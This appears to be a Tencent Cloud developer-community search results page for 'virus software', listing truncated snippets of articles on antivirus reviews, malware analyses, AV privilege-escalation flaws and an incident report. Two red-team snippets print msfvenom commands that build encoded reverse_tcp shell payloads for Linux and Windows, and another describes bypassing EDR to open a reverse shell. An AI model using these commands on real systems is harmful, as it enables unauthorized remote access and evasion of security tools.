- 综合排序
- 最热优先
- 最新优先
- 来自专栏HansBug's Lab
Codevs2018 反病毒软件
2018 反病毒软件 时间限制: 1 s 空间限制: 128000 KB 题目等级 : 钻石 Diamond 查看运行结果 题目描述 Description 其实这个“反病毒软件”(Anti-Virus a:array[0..500050] of vet; 8 d:array[0..500050] of longint; 9 c:array[0..10] of longint; 10
1.2K60发布于 2018-04-10 - 来自专栏网络安全攻防
【神兵利器】绕过EDR防病毒软件
项目演示了使用Windows API函数(例如:VirtualAlloc、CreateThread和WaitForSingleObject)绕过EDR和防病毒保护,有效负载被直接注入到进程内存中而不被安全工具检测到,从而为反向shell建立到远程系统的连接
53710编辑于 2025-01-07 - 来自专栏用户8851537的专栏
分享几个在线扫描病毒软件的网站
说明:很多人平常喜欢下一些破解软件,很多杀毒软件喜欢报毒,可文件本身却没有病毒,却又不想很折腾去下工具来检测,所以这里推荐几个可以在线扫描软件病毒的网站。
24.9K30发布于 2021-07-26 - 来自专栏飞雪无情的博客
技能 | 傻瓜式应对比特币勒索病毒软件
5月12日,英国、意大利、俄罗斯等全球多个国家爆发勒索病毒攻击,中国的校园网也未能幸免,部分高校电脑被感染,有学生毕业论文被病毒加密,只有支付高额赎金才能恢复。
87710发布于 2018-08-28 - 来自专栏Y5neKO博客
一次对带病毒软件的分析
软件下载下来打开,确实正常打开了youtube下载器,然后查看进程,发现名为 TemporaryFile的进程
1.6K10编辑于 2022-01-13 - 来自专栏FreeBuf
简单方法检测远端用户的反病毒软件
我立刻意识到是我的反病毒软件做了 MITM,在网页上注入代码来跟踪页面的活动。 DOCTYPE html><html><head><title>Remotely AV detection</title></head><body><iframe style="width:<em>10</em>px; height:<em>10</em>px; display:block; visibility:show" id="frmin" src="/iframe.html"></iframe><button onclick= 我想看看这种方法对于其他反病毒软件的检出情况,是只能检出卡巴斯基还是其他的也可以。接下来对 Avira、Norton、DrWeb 反病毒软件进行检测,如果有人想继续研究,我很高兴听到研究的结果。 这种方法并不能保证百分之百检出反病毒软件,因为用户可以禁用安装的 Chrome 扩展。 2. 这篇文章的灵感主要来自于远程检测用户反病毒软件。 3. 相关代码可以在 GitHub 上找到。
1.4K100发布于 2018-02-09 - 来自专栏FreeBuf
挖洞经验 | Panda反病毒软件本地提权漏洞分析
在这篇文章中,我将跟大家讨论一个我在Panda反病毒产品中发现的一个安全漏洞(CVE-2019-12042),这是一个本地提权漏洞,该漏洞将允许攻击者在目标设备上将非特权账户提权至SYSTEM。
1.5K20发布于 2019-07-17 - 来自专栏FreeBuf
新型勒索病毒软件GruxEr来袭:深度分析如何传播、加密及如何删除
通常,费用在10美元到20美元左右。 ? USB-to-USB电缆,两侧均为公头。 对于Windows 8,8.1和10 步骤1:打开开始菜单 ? 步骤2: 虽然按住Shift键按钮,点击电源,然后单击 重新启动。 步骤3: 重新启动后,将显示后面提到的菜单。
1.7K60发布于 2018-02-24 - 来自专栏用户8715145的专栏
为什么要安装代码签名证书 从安全上扫描和杜绝病毒软件
从安全上扫描和杜绝病毒软件 其次就是防护避免恶意攻击和篡改,在安装了之后进行软件的下载,代码签名证书会先进行安全扫描,并且验证开发者身份,确保安装包及安装过程当中不会出现病毒携带。 所以为什么要安装代码签名证书,更多的是体现在了系统运行的安全性上,可以避免被外部病毒软件或是没有安全保障的软件所侵害。
79330发布于 2021-10-14 - 来自专栏FreeBuf
借壳防病毒软件,SharkBot银行木马在Google Play传播
Affairs网站消息,Check Point Research (CPR) 团队的研究人员发布报告称,在谷歌官方 Google Play 商店中发现了几个恶意 Android 应用程序,这些应用程序伪装成防病毒软件
1.1K40编辑于 2022-04-14 - 来自专栏FreeBuf
从源码层面看一款精致的病毒软件应具备哪些特质
二、正文 本文主要从源代码来看看一款精致的病毒软件,它应该具备什么样的功能,模块化设计该如何规划。 源代码解压: ?
74630发布于 2019-05-14 2025 年最佳防病毒软件深度评测:Bitdefender、Norton、McAfee 谁才是王者?
在这个网络威胁日益复杂化的时代,防病毒软件已不再只是“锦上添花”,而是保障个人和企业数据安全的第一道防线。从勒索病毒、木马程序到身份盗窃和钓鱼攻击,任何一个漏洞都可能导致不可挽回的损失。 作为拥有 30 年防病毒软件测试和研究经验的安全团队,我们进行了深入对比,结合 EICAR 病毒模拟包测试、第三方权威机构(AV-TEST、AV-Comparatives)结果,最终筛选出 2025 年最佳防病毒软件排行榜 结论速览:最佳整体选择:Bitdefender Total Security最佳家庭保护:Norton 360(含 LifeLock)最佳移动端安全:McAfee+ Premium为什么需要防病毒软件? 年费(起) 设备数 是否包含 VPN是否含身份保护 Bitdefender\$29.995-25 台✅(限流) ❌ Norton \$39.991-10 :更多防病毒软件将集成 VPN、密码管理、暗网监控云安全服务:远程备份 + 多终端同步成为标配轻量化与跨平台:减少性能占用,兼容 PC、移动设备甚至 IoT
4.7K10编辑于 2025-09-12- 来自专栏超前沿网络空间安全全栈学习宝典
红队白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒软件获取shell
msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -i 10 \ # 设置攻击者的监听端口 -b "\x00" \ # 避免使用空字符(NULL 字符) -i 10 \ # 设置载荷编码的迭代次数为 10 -f elf \ # 输出为 ELF 格式的文件
97510编辑于 2024-12-25 - 来自专栏贝丝的专栏
开机黑屏或空白屏幕?
如果连接状况良好并且你仍然看到黑屏或空白屏幕,请尝试操作 3中的步骤,以删除第三方防病毒软件。 操作 3:删除第三方防病毒软件 现在已经知道,某些第三方防病毒软件会导致出现黑屏或空白屏幕。 选择要删除的第三方防病毒软件,然后选择“卸载”。删除第三方防病毒软件后,重启设备。 如果你仍看到黑屏或空白屏幕,请尝试 操作 4中的步骤以执行干净启动。 操作 5:确保 Windows 10 支持你的显卡 如果你遇到黑屏或空白屏幕,可能是你的显卡和 Windows 10 之间存在兼容性问题。 执行此操作的最佳方法是查看显卡制造商网站,看是否有适用于 Windows 10 的最新、最兼容的显卡驱动程序,并了解与Windows 10之间的兼容性状态。 如果你仍看到黑屏或空白屏幕,请尝试操作 5中的步骤以删除第三方防病毒软件。 操作 5:删除第三方防病毒软件 现在已经知道,某些第三方防病毒软件会导致出现黑屏或空白屏幕。
8.9K21发布于 2020-04-02 - 来自专栏菜鸟程序员
多家反病毒软件存在AVGater问题,恶意软件反可利用隔离区提权
几款常见的反病毒软件中曝出存在一种可让攻击者利用隔离区来提升恶意软件权限的问题,涉及的反病毒软件厂商具体有趋势科技、Emisoft、卡巴斯基,Malwarebytes, Check Point (ZoneAlarm 其他厂商的反病毒软件也有可能受到影响。 ? 攻击利用方法 攻击者如果侵入了计算机系统,他们总是会想要提权来获取机密数据,并自如地穿梭在网络中之中。 近日,信息安全审计员 Florian Bogner 发现了一种全新的提权方法:利用反病毒软件的隔离区特性。这种攻击方法 AVGater 的具体实现,组合利用了几个反病毒软件的设计漏洞和已知技巧。 及时更新反病毒软件产品 据了解,目前这个漏洞会影响趋势科技、Emsisoft, 卡巴斯基,Malwarebytes, Check Point (ZoneAlarm) 以及Ikarus 的反病毒软件。 其他厂商的反病毒软件也有可能受到影响(在修复程序放出之前并不会公开这些厂商的名字)。 ?
1K40发布于 2018-06-19 - 来自专栏菜鸟程序员
AVGater漏洞突破防病毒软件 影响大批知名杀毒软件 PoC已经公开
奥地利 Kapsch的信息安全审计师 Florian Bogner表示, 他发现了一种新的方法来实现这一点,也就是滥用一些防病毒软件中的检疫功能(隔离功能)。 AVGater攻击方式利用了杀毒软件的隔离功能及Windows Junctions文件链接功能 根据 Bogner的说法, 攻击从恶意 DLL 文件开始, 并由防病毒软件置于隔离文件夹中。 ==navigator.appVersion.indexOf("MSIE 10"),h=!!navigator.userAgent.match(/Trident. d.getAttribute("data-secret"))f=Math.random().toString(36).substr(2,10),d.src+="#? 专家还警告说,防病病毒软件不仅可以增加黑客的攻击面, 而且还会削弱 HTTPS 的安全性。
80150发布于 2018-06-19 - 来自专栏IT大咖说
2022年 6 款适用于 Linux 的最佳免费杀毒软件
针对计算机的防护,杀毒软件是一个重要手段,下面我们列出一些你可以获得的最好的免费防病毒软件。 ◆ 适用于 Linux 的最佳防病毒软件 1. ClamAV ClamAV 是一款开源防病毒软件,可检测病毒、恶意软件、特洛伊木马和其他威胁,它也免费提供,这使其成为 Linux 上最好的防病毒软件之一。 Sophos 作为另一款免费的防病毒软件,Sophos 具有高级功能,并且在您的 Linux 系统上也能轻松运行。 投稿、约稿、转载请加微信:ITDKS10(备注:投稿),茉莉小姐姐会及时与您联系! 感谢您对IT大咖说的热心支持! 简单说说ES6新特性 Redis 中使用 list,streams,pub/sub 几种方式实现消息队列 新一代多系统启动U盘解决方案 架构师学习笔记之:并发编程(图解原子操作) 2022年最好的10个
22.6K40编辑于 2022-04-07 - 来自专栏FreeBuf
当“宿主”披上QQ盗号的外衣
从一个“宿主”软件出发,设定1个用户被骗,此用户会直接从“宿主”推广中下载1个病毒软件;之后此用户为了查看破解成功的密码,进行了10个QQ群的分享;在群分享信息中,包含了病毒推广群的信息,以最小基数设定 ,假设每个分享群中有1个用户进入了病毒群;在每个病毒推广群消息“邀10人进群给50元”中,有1人受骗,邀了10人进群;在每个病毒推广群文件中平均有2个不同变种的“宿主”软件和2个病毒软件,从1人受骗,到 10个分享群每个1人受骗,再到病毒推广群每群1人受骗邀请10人进群,共受骗人数合计111,病毒和“宿主”使用次数444人次。 图3-10 服务器分享QQ群信息 得到它大量的推广QQ 群之后,我们伪装成受骗用户,加入群聊,看到它在不断的诱导用户分享和使用“宿主”软件和病毒软件,下面是病毒推广QQ群602*462的共享群文件,如图 用户发现感染手机病毒软件之后,可以向“12321网络不良与垃圾信息举报受理中心”或“中国反网络病毒联盟”进行举报,使病毒软件能够第一时间被查杀和拦截。
1.4K00发布于 2018-07-30 - 来自专栏FreeBuf
ld-linux-x86-64挖矿木马实战记录
,每次我都会借助安全事件,狠狠的推一把防病毒软件,目前为止,已经实现所有PC和Windows服务器防病毒软件的百分百覆盖。 进入/dev/shm/.x/,查看目录详情,其中有多个文件的最后修改时间跟IDS的日志时间(2021/1/10 4:32)吻合,同时能看出,该木马程序最早可追溯到2015年3月10日。 ? 攻击者通过内网另一台服务器172.29.4.52登录,时间1/10 02:25:30。 7、马某终端检查 之前在分析木马程序过程中,当把病毒文件拷贝到本机时,防病毒软件第一时间就已经自动隔离了两个文件,说明防病毒软件是可以检测该挖矿木马的。 公司统一部署企业版终端防病毒软件,可马某的电脑是怎么中毒的呢?
5.8K30发布于 2021-03-09 - 来自专栏超前沿网络空间安全全栈学习宝典
红队白帽必经之路(18)——如何用Metasploit 制作Windows恶意木马病毒软件获取shell
-p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 windows syscall evasion technique 6 exploit/unix/webapp/php_eval 2008-10 process_herpaderping normal No Process Herpaderping evasion technique 10 For example info 10, use 10 or use post/windows/gather/checkvm
88510编辑于 2024-12-25
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号